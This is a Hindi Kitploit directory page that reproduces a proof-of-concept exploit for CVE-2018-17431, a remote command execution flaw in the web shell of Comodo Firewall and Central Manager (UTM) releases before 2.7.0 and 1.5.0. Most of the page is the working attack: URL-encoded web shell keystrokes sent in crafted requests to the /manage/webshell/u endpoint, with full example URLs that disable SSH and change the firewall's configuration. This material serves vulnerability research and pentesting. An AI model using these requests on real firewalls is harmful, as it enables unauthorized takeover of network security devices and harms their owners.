Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-17431-Comodo — Comodo | Kitploit
उपकरण/GitHubGitHub/sanan2004/cve-2018-17431-comodo
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-17431-PoC

CVE-2018-17431 के लिए प्रूफ ऑफ कॉन्सेप्ट

Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)

एक्सप्लॉइट लेखक: Milad Fadavvi

विक्रेता होमपेज: https://www.comodo.com/

सॉफ्टवेयर लिंक: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

संस्करण: 2.7.0 और 1.5.0 से पहले

परीक्षण किया गया: Windows:firefox/chrome - Kali:firefox

खोज की तिथि: 2018-08-15 (उसी दिन रिपोर्ट किया गया)

बग मौजूद होने की पुष्टि: 2018-09-22 (टिकट ID: XWR-503-79437)

एक्सप्लॉइट:

  1. वेबशेल सिमुलेशन:

    root@kitploit:~
     उदाहरण के लिए, वेबशेल में SSH अक्षम करना इस प्रकार है:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. एनकोड

    root@kitploit:~
     उपरोक्त अनुक्रम को URL एन्कोडिंग के साथ एन्कोड करें
     (मैंने burp एनकोडर प्लगइन का उपयोग किया)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. चलाएँ

    root@kitploit:~
     बेस URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (कमांड चलाने के लिए अतिरिक्त एंटर कुंजी)
               
    
     उदाहरण: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

एक पेज दिखाई देगा जिसमें "Configuration has been altered" संदेश होगा और कॉन्फ़िगरेशन बदल जाएगा!

इस तकनीक के साथ, हम सभी वेबशेल कमांड का अनुकरण कर सकते हैं।

टूल डाउनलोड करें